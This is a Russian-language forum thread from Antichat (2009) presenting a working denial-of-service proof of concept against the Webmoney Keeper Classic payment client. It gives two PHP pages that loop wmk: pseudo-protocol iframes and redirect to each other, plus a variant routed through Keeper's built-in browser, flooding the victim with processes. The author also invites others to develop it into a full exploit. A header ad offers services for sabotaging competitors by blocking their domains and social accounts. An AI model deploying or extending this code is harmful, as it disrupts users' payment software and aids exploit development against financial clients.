Форум АНТИЧАТ - Webmoney Keeper Classic (3.6.0.6) DоS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Soft - Windows
Webmoney Keeper Classic (3.6.0.6) DоS

Опции темы

Поиск в этой теме

Опции просмотра

Webmoney Keeper Classic (3.6.0.6) DоS

02.02.2009, 21:14

brain[pillow]

Участник форума

Регистрация: 07.11.2008

Сообщений: 124

Провел на форуме:
1483379

Репутация: 386

Отправить сообщение для brain[pillow] с помощью ICQ

Webmoney Keeper Classic (3.6.0.6) DоS

Нашёл как вогнать клиент от Webmoney в DOS. Исполнение вообще очень напоминает олдскульные сплоенты под IE. Должно работать под IE и FF. Ну и надо быть залогиненым в кипере.

Итак, создаём две страницы:

index.php

PHP код:


		
			
<?php

for($i=0; $i!=10; $i++) echo ‘<iframe src=”wmk:display?window=about”></iframe><iframe src=”wmk:exit?BringToFront=n”></iframe>’;

?>

<iframe src=”wmk:exit?BringToFront=Y”></iframe>

<script>document.location.href=”http://_ваш_саент_/index2.php”;</script>

index2.php

PHP код:


		
			
<?php

for($i=0; $i!=10; $i++) echo ‘<iframe src=”wmk:display?window=about”></iframe><iframe src=”wmk:exit?BringToFront=n”></iframe>’;

?>

<iframe src=”wmk:exit?BringToFront=Y”></iframe>

<script>document.location.href=”http://_ваш_саент_/index.php”;</script>

Ну и всё, натравливаем на индекс или делаем вот так ещё в какой-нибудь третьей страничке (тогда распространителем кучи окон будет не IE/FF, а встроенная просматривалка Webmoney):

PHP код:


		
			
<script>document.location.href=”wmk:explore?url=javascript:document.location.href=”http://_ваш_саент_/index.php”&BRINGTOFRONT=Y&title=let the horror begin”;</script>

Создаётся дофига вебманевских процессов, жрущих память. Есть там BOF, или нет - я не в курсе, ибо с реверсингом не знаком. Поэтому создал топик для обсуждений - вдруг что-то более полезное можно из этого выжать. Так же неплохо было бы проверить на новых версиях.

Также в FF нужно чтобы пользователь уже до этого проходил по псевдопротокольным ссылкам вида "wmk:" и оставил там галочку "запомнить выбор и больше не спаршивать".

(c) brain[pillow]
http://brainpillow.cc/2009/02/webmoney-keeper-classic-3606-dos/

Последний раз редактировалось brain[pillow]; 02.02.2009 в 21:16..

03.02.2009, 14:58

brain[pillow]

Участник форума

Регистрация: 07.11.2008

Сообщений: 124

Провел на форуме:
1483379

Репутация: 386

Где реверсеры? Неужели никому не интересно? Ведь есть вероятность написать эксплоит к киперу, неужто никто не неходит эту идею заманчивой?

03.02.2009, 15:22

~~.AkeLLa~~

Banned

Регистрация: 30.08.2008

Сообщений: 477

Провел на форуме:
3989114

Репутация: 718

Молодец.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
WebMoney Keeper Classic или массовая параноя...	d3ath	Болталка	20	26.10.2006 07:57
Запуск WebMoney Keeper, беспалева	null_access	Анонимность	3	28.02.2006 01:22

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход